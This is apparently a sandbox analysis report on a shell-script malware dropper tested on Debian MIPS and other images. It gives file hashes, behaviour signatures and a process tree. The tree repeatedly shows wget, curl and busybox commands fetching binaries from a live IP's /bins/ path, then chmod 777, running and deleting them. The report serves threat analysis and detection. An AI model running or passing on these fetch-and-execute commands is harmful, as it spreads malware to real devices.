Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
-
Size
10KB
-
MD5
9498e3b84daf1f4fc7db572ea81ea29a
-
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
-
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
-
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
-
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 827 chmod 834 chmod 900 chmod 912 chmod 955 chmod 961 chmod 765 chmod 785 chmod 806 chmod 840 chmod 888 chmod 937 chmod 949 chmod 756 chmod 882 chmod 918 chmod 924 chmod 861 chmod 750 chmod 894 chmod 906 chmod 931 chmod 943 chmod 740 chmod -
Executes dropped EXE 24 IoCs
ioc pid Process /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 741 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 751 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 757 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 766 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 787 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 807 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 829 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc 835 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa 841 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc 863 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 883 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM 889 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 895 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 901 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 907 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 913 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 919 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 925 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 932 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 938 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 944 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 950 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 956 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 962 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl File opened for modification /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa curl File opened for modification /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl File opened for modification /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc curl
Processes
-
/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh1⤵PID:712
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:737
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:749
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:755
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:759
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:764
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:782
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:803
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:826
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:833
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:837
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:839
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:858
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:879
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:887
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:891
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:893
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:896
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:897
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:899
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:902
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:903
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:905
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:911
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:914
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:915
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:917
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:923
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:930
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:936
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:942
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:948
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:951
-
-
